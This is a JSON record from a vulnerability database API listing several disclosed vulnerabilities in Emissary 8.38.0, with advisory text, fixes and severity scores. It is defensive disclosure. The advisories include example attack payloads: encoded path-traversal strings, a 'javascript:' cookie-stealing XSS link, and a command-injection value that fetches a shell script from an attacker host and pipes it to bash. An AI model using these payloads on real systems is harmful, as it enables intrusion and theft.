Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1055729?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1055729?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.38.0", "type": "maven", "namespace": "gov.nsa.emissary", "name": "emissary", "version": "8.38.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "8.43.0", "latest_non_vulnerable_version": "8.43.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/350507?format=api", "vulnerability_id": "VCID-41ah-1nyc-aych", "summary": "Emissary has a Path Traversal via Blacklist Bypass in Configuration API\n## Summary\n\nThe configuration API endpoint (`/api/configuration/{name}`) validated\nconfiguration names using a blacklist approach that checked for `\\`, `/`, `..`,\nand trailing `.`. This could potentially be bypassed using URL-encoded variants,\ndouble-encoding, or Unicode normalization to achieve path traversal and read\nconfiguration files outside the intended directory.\n\n## Details\n\n### Vulnerable code — `Configs.java` (line 126)\n\n```java\nprotected static String validate(String config) {\n if (StringUtils.isBlank(config) || config.contains(\"\\\\\") || config.contains(\"/\")\n || config.contains(\"..\") || config.endsWith(\".\")) {\n throw new IllegalArgumentException(\"Invalid config name: \" + config);\n }\n return Strings.CS.appendIfMissing(config.trim(), CONFIG_FILE_ENDING);\n}\n```\n\n### Weakness\n\nThe blacklist blocked literal `\\`, `/`, `..`, and trailing `.` but could\npotentially miss:\n\n- URL-encoded variants (`%2e%2e%2f`) if decoded after validation\n- Double-encoded sequences (`%252e%252e%252f`)\n- Unicode normalization bypasses\n- The approach relies on string matching rather than canonical path resolution\n\n### Impact\n\n- Potential read access to configuration files outside the intended config\n directory\n- Information disclosure of sensitive configuration values\n\n## Remediation\n\nFixed in [PR #1292](https://github.com/NationalSecurityAgency/emissary/pull/1292),\nmerged into release 8.39.0.\n\nThe blacklist was replaced with an allowlist regex that only permits characters\nmatching `^[a-zA-Z0-9._-]+$`:\n\n```java\nprotected static final Pattern VALID_CONFIG_NAME = Pattern.compile(\"^[a-zA-Z0-9._-]+$\");\n\nprotected static String validate(String config) {\n if (!VALID_CONFIG_NAME.matcher(config).matches() || config.contains(\"..\") || config.endsWith(\".\")) {\n throw new IllegalArgumentException(\"Invalid config name: \" + config);\n }\n return Strings.CS.appendIfMissing(config.trim(), CONFIG_FILE_ENDING);\n}\n```\n\nThis ensures that any character outside the allowed set — including encoded\nslashes, percent signs, and Unicode sequences — is rejected before the config\nname reaches the filesystem.\n\nTests were added to verify that URL-encoded (`%2e%2e%2f`), double-encoded\n(`%252e%252e%252f`), and Unicode (`U+002F`) traversal attempts are blocked.\n\n## Workarounds\n\nIf upgrading is not immediately possible, deploy a reverse proxy or WAF rule\nthat rejects requests to `/api/configuration/` containing encoded path traversal\nsequences.\n\n## References\n\n- [PR #1292 — validate config name with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1292)\n- Original report: GHSA-wjqm-p579-x3ww", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35583", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11568", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11499", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11558", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11534", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15512", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15513", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15473", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15422", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15452", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15526", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15449", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15327", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15456", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17121", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17028", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.16999", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17033", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35583" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1292", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1292" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-hxf2-gm22-7vcm", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T16:12:26Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-hxf2-gm22-7vcm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35583", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35583" }, { "reference_url": "https://github.com/advisories/GHSA-hxf2-gm22-7vcm", "reference_id": "GHSA-hxf2-gm22-7vcm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hxf2-gm22-7vcm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1048895?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.39.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-fgcj-zvq7-e3ea" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0" } ], "aliases": [ "CVE-2026-35583", "GHSA-hxf2-gm22-7vcm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-41ah-1nyc-aych" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/350492?format=api", "vulnerability_id": "VCID-d1zn-ry4s-cbff", "summary": "Emissary has Stored XSS via Navigation Template Link Injection\n## Summary\n\nMustache navigation templates interpolated configuration-controlled link values\ndirectly into `href` attributes without URL scheme validation. An administrator\nwho could modify the `navItems` configuration could inject `javascript:` URIs,\nenabling stored cross-site scripting (XSS) against other authenticated users\nviewing the Emissary web interface.\n\n## Details\n\n### Vulnerable code — `nav.mustache` (line 10)\n\n```html\n{{#navItems}}\n<li class=\"nav-item\">\n <a class=\"nav-link\" href=\"{{link}}\">{{display}}</a>\n</li>\n{{/navItems}}\n```\n\nThe `{{link}}` value was rendered without any scheme validation. Mustache's\ndefault HTML escaping protects against injection of new HTML tags but does\n**not** prevent `javascript:` URIs in `href` attributes, since `javascript:`\ncontains no characters that HTML-escaping would alter.\n\n### Attack vector\n\nAn administrator sets a navigation item's link to:\n```\njavascript:alert(document.cookie)\n```\n\nAny authenticated user who clicks the navigation link executes the script in\ntheir browser context.\n\n### Impact\n\n- Session hijacking via cookie theft\n- Actions performed on behalf of the victim user\n- Requires administrative access to modify navigation configuration\n- Requires user interaction (clicking the malicious link)\n\n### Mitigating factors\n\n- Exploitation requires administrative access to modify the `navItems`\n configuration\n- User interaction (clicking the link) is required\n- The Emissary web interface is typically accessed only by authenticated\n operators within a trusted network\n\n## Remediation\n\nFixed in [PR #1293](https://github.com/NationalSecurityAgency/emissary/pull/1293),\nmerged into release 8.39.0.\n\n### Server-side link validation — `NavAction.java`\n\nAn allowlist regex was added that only permits `http://`, `https://`, or\nsite-relative (`/`) URLs:\n\n```java\nprivate static final Pattern VALID_LINK = Pattern.compile(\"^(https?:/)?/.*\");\n\nprivate static boolean isValidLink(String link) {\n if (!VALID_LINK.matcher(link).matches()) {\n logger.warn(\"Skipping invalid navigation link '{}'\", link);\n return false;\n }\n return true;\n}\n```\n\nInvalid links are logged and silently dropped from the rendered navigation.\n\n### Template hardening — `nav.mustache`\n\nAdded `rel=\"noopener noreferrer\"` to all navigation link anchor tags as a\ndefense-in-depth measure:\n\n```html\n<a class=\"nav-link\" href=\"{{link}}\" rel=\"noopener noreferrer\">{{display}}</a>\n```\n\nTests were added to verify that `javascript:` and `ftp://` URIs are rejected\nwhile `http://`, `https://`, and site-relative (`/path`) links are accepted.\n\n## Workarounds\n\nIf upgrading is not immediately possible, audit the navigation configuration\nto ensure all `navItems` link values use only `http://`, `https://`, or\nrelative (`/`) URL schemes.\n\n## References\n\n- [PR #1293 — validate nav links](https://github.com/NationalSecurityAgency/emissary/pull/1293)\n- Original report: GHSA-wjqm-p579-x3ww", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35571", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07495", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07477", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07489", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07471", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08173", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08211", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08237", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08076", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08089", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08192", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09184", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.0902", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09107", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10307", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10234", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10211", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.1025", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35571" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/commit/e2078417464b9004620dde28dcbca2f73ea06c13", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/commit/e2078417464b9004620dde28dcbca2f73ea06c13" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1293", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:56:55Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1293" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-cpm7-cfpx-3hvp", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:56:55Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-cpm7-cfpx-3hvp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35571", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35571" }, { "reference_url": "https://github.com/advisories/GHSA-cpm7-cfpx-3hvp", "reference_id": "GHSA-cpm7-cfpx-3hvp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cpm7-cfpx-3hvp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1048895?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.39.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-fgcj-zvq7-e3ea" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0" } ], "aliases": [ "CVE-2026-35571", "GHSA-cpm7-cfpx-3hvp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d1zn-ry4s-cbff" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/349659?format=api", "vulnerability_id": "VCID-fgcj-zvq7-e3ea", "summary": "", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35582", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.1679", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.16756", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18681", "published_at": "2026-05-12T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18649", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18686", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18584", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.1867", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18778", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.185", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18625", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00072", "scoring_system": "epss", "scoring_elements": "0.2168", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35582" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-35582", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-35582" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/commit/1faf33f2494c0128f250d7d2e8f2da99bbd32ae8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-20T15:48:23Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/commit/1faf33f2494c0128f250d7d2e8f2da99bbd32ae8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35582", "reference_id": "CVE-2026-35582", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35582" }, { "reference_url": "https://github.com/advisories/GHSA-3p24-9x7v-7789", "reference_id": "GHSA-3p24-9x7v-7789", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3p24-9x7v-7789" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3p24-9x7v-7789", "reference_id": "GHSA-3p24-9x7v-7789", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-20T15:48:23Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3p24-9x7v-7789" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1066771?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.43.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.43.0" } ], "aliases": [ "CVE-2026-35582", "GHSA-3p24-9x7v-7789" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fgcj-zvq7-e3ea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/349879?format=api", "vulnerability_id": "VCID-u7m6-swgm-tqf9", "summary": "", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35580", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0295", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02899", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0292", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02925", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05162", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05121", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05096", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04949", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05076", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0513", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05201", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05152", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05164", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05912", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.0589", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05904", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05905", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35580" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1286", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1286" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1288", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1288" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35580", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35580" }, { "reference_url": "https://github.com/advisories/GHSA-3g6g-gq4r-xjm9", "reference_id": "GHSA-3g6g-gq4r-xjm9", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3g6g-gq4r-xjm9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1048895?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.39.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-fgcj-zvq7-e3ea" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0" } ], "aliases": [ "CVE-2026-35580", "GHSA-3g6g-gq4r-xjm9" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u7m6-swgm-tqf9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/350526?format=api", "vulnerability_id": "VCID-vst1-rzvp-9bec", "summary": "Emissary has a Command Injection via PLACE_NAME Configuration in Executrix\n## Summary\n\nThe `Executrix` utility class constructed shell commands by concatenating\nconfiguration-derived values — including the `PLACE_NAME` parameter — with\ninsufficient sanitization. Only spaces were replaced with underscores, allowing\nshell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through\ninto `/bin/sh -c` command execution.\n\n## Details\n\n### Vulnerable code — `Executrix.java`\n\n**Insufficient sanitization (line 132):**\n```java\nthis.placeName = this.placeName.replace(' ', '_');\n// ONLY replaces spaces — shell metacharacters pass through\n```\n\n**Shell sink (line 1052–1058):**\n```java\nprotected String[] getTimedCommand(final String c) {\n return new String[] {\"/bin/sh\", \"-c\", \"ulimit -c 0; cd \" + tmpNames[DIR] + \"; \" + c};\n}\n```\n\n### Data flow\n\n1. `PLACE_NAME` is read from a configuration file\n2. `Executrix` applies only a space-to-underscore replacement\n3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`)\n4. `tmpNames[DIR]` is concatenated into a shell command string\n5. The command is executed via `/bin/sh -c`\n\n### Example payload\n\n```\nPLACE_NAME = \"test;curl attacker.com/shell.sh|bash;x\"\n```\n\nAfter the original sanitization: `test;curl_attacker.com/shell.sh|bash;x`\n(semicolons, pipes, and other metacharacters preserved)\n\n### Impact\n\n- Arbitrary command execution on the Emissary host\n- Requires the ability to control configuration values (e.g., administrative\n access or a compromised configuration source)\n\n## Remediation\n\nFixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290),\nmerged into release 8.39.0.\n\nThe space-only replacement was replaced with an allowlist regex that strips all\ncharacters not matching `[a-zA-Z0-9_-]`:\n\n```java\nprotected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile(\"[^a-zA-Z0-9_-]\");\n\nprotected static String cleanPlaceName(final String placeName) {\n return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll(\"_\");\n}\n```\n\nThis ensures that any shell metacharacter in the `PLACE_NAME` configuration\nvalue is replaced with an underscore before it can reach a command string.\n\nTests were added to verify that parentheses, slashes, dots, hash, dollar signs,\nbackslashes, quotes, semicolons, carets, and at-signs are all sanitized.\n\n## Workarounds\n\nIf upgrading is not immediately possible, ensure that `PLACE_NAME` values in all\nconfiguration files contain only alphanumeric characters, underscores, and hyphens.\n\n## References\n\n- [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290)\n- Original report: GHSA-wjqm-p579-x3ww", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35581", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.1845", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": 